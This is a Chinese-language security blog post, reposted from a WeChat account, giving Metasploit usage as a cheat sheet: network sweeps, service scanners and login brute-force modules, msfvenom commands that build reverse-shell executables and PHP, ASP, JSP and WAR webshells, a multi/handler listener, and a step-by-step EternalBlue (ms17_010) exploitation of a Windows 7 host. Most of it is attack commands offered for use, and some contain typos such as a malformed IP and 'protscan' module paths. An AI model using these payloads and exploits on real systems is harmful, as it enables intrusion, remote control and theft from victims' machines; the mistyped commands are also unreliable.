Metasploit工具部分模块使用

admin 2025年6月2日01:29:07评论12 views字数 3284阅读10分56秒阅读模式
Metasploit工具部分模块使用
1.arp_sweep
通过发送 ARP请求来枚举本地局域网中的所有活跃主机
📍

use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.10.0/24
run

2.udp_sweep
使用udp对指定IP地址主机进行udp扫描
🎹

 use scanner/discovery/udp_sweep
set RHOSTS 192.1681.145
run

3.TELNET服务模块
🎁

use auxiliary/scanner/telnet/telnet_login
set RHOSTS 192.168.1.102
run

4.SSH服务模块
🎼

1.ssh弱口令探测
  use auxiliary/scanner/ssh/ssh_login
2.ssh公共密钥认证登录
   use auxiliary/scanner/ssh/ssh_login_pubkey
3.扫描ssh版本测试
  use auxiliary/scanner/ssh/ssh_version

5.SMB服务模块
🎁

1.模块搜索
命令:search scanner/smb
2.SMB枚举
命令:auxiliary/scanner/smb/smb_enumusers
3.返回DCERPC信息
命令:auxiliary/scanner/smb/pipe_dcerpc_auditor
4.扫描SMB2协议
命令:auxiliary/scanner/smb/smb2
5.扫描smb共享文件
命令:auxiliary/scanner/smb/smb_enumshares
6.枚举系统上的用户
命令:auxiliary/scanner/smb/smb_enumusers
7.SMB登录
命令:auxiliary/scanner/smb/smb_login
8.扫描组的用户
命令:auxiliary/scanner/smb/smb_lookupsid
9.扫描系统版本
命令:auxiliary/scanner/smb/smb_version

6.FTP服务模块
✍️

1.ftp版本扫描

命令:scanner/ftp/ftp_version
2.ftp匿名登录扫描

命令:scanner/ftp/anonymous

7.SMTP服务模块
📌

1.smtp枚举

命令:auxiliary/scanner/smtp/smtp_enum
2.扫描smtp版本

命令:auxiliary/scanner/smtp/smtp_version

8.MSF端口扫描,模块配置
🎁

1.模块搜索

命令:search scanner/portscan
2.通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测

命令:auxiliary/scanner/protscan/ack
3.通过FTP bounce攻击的原理对TCP服务进行枚举

命令:auxiliary/scanner/protscan/ftpbounce
4.使用发送TCP SYN标志的方式探测开放端口

命令:auxiliary/scanner/protscan/syn
5.通过一次完整的TCP连接来判断端口是否开放 最准确但是最慢

命令:auxiliary/scanner/protscan/tcp
6.一种更为隐秘的扫描方式,通过发送FIN,PSH,URG标志,能够躲避一些高级的TCP标记检测器的过滤

命令:auxiliary/scanner/protscan/xmas

9.payload生成
msfvenom -l可以列出MSFVenom可以生成的payload列表
msf中使用msfvenom生成payload。同时在msf生成木马时有四大要素:
🌰

1.攻击主机种类(Windowslinux)、
2.木马种类(reverse_tcpbind shell)、
3.监听主机、监听端口,监听使用就是metepreter。

10.生成二进制文件
Windows
🏆

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Linux
🚅

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Mac:
🌅

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

这里的LHOST的地址就是攻击机的IP地址,而LPORT的端口就是攻击机的端口。
11.生成payload文件
Windows为例
👍

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.20 LPORT=4444 -f exe > shell.exe

Metasploit工具部分模块使用
12.发送payload文件
将构建号的payload文件发送到Windows系统中。
13.监听payload文件
💡

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.10.20
set LPORT  4444
set ExitOnSession false
exploit -j -z

Metasploit工具部分模块使用
14.运行payload文件
直接双击运行,或者cmd运行等,都可以实现运行,运行并不会弹出窗口等。
15.上线payload
sessions命令可以看到
16.利用payload
sessions -i 1进行利用,这里的1是序号,可以通过上线的payload的序号进行利用
17.webshell脚本,生成webshell脚本
PHP:
🥖

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

ASP:
🏝️

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP:
💡

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR:
🍰

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

18.生成针对PHP的payload文件
🌰

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.10.20 LPORT=4444 -f raw > shell.php

19.Msfconsole整体渗透流程
环境准备
🦄

1.Windows7系统需要关闭防火墙,若开启防火墙可能会存在问题。
2.  攻击机:IP地址
3.  受害者w7:IP地址

启动Metasploit
🎹

msfconsole

搜索永恒之蓝
🎨

search ms17_010

选择扫描模块
🍰

use auxiliary/scanner/smb/smb_ms17_010

设置参数
📍

show options    查看哪些参数是必设的
set rhosts 192.168.1.102   本机IP。

执行扫描
🏕️

run

选择渗透模块
🎁

use exploit/windows/smb/ms17_010_eternalblue

设置参数

set rhosts 192.168.1.102

执行渗透
🎉

run

原文始发于微信公众号(运维星火燎原):Metasploit工具部分模块使用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月2日01:29:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit工具部分模块使用http://cn-sec.com/archives/4118332.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息